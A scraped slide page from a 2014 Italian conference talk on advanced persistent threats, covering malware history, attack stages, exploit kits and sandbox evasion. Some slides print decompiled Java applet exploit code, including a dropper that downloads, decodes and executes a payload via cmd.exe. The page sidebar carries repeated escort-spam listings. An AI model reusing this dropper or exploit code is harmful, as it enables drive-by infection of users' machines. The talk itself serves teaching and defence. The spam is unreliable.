Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 

KĂŒrzlich hochgeladen (20)

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 

The magic world of APT 0.6 - Pompili

  • 1. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
  • 2. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 3. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
  • 4. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
  • 5. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
  • 6. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
  • 7. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
  • 8. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
  • 9. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
  • 10. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware piĂč complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
  • 11. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
  • 12. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
  • 13. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
  • 14. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
  • 15. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
  • 16. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
  • 17. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
  • 18. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
  • 19. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
  • 20. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
  • 21. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
  • 22. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
  • 23. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
  • 24. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
  • 25. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
  • 26. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
  • 27. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
  • 28. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
  • 29. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  • 30. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  • 31. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
  • 32. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
  • 33. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
  • 34. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
  • 35. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
  • 36. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
  • 37. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
  • 38. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
  • 39. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
  • 40. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
  • 41. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
  • 42. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
  • 43. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
  • 44. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
  • 45. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
  • 46. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
  • 47. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
  • 48. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
  • 49. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero Ăš il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica

  • 50. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
  • 51. Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian â€«Ű©â€ŹÙ‘ÙŽâ€«ÙŠâ€ŹÙŽâ€«ŰŁâ€Ź â€«ÙŰšâ€Źâ€«Ù„â€Źâ€«Ű§â€ŹÙŽâ€«Ű·â€ŹÙŽâ€«Ù…â€Ź Arabic ÂżPreguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Î•ÏÏ‰Ï„ÎźÏƒÎ”Îčς? Greek ĐČĐŸĐżŃ€ĐŸŃŃ‹? Russian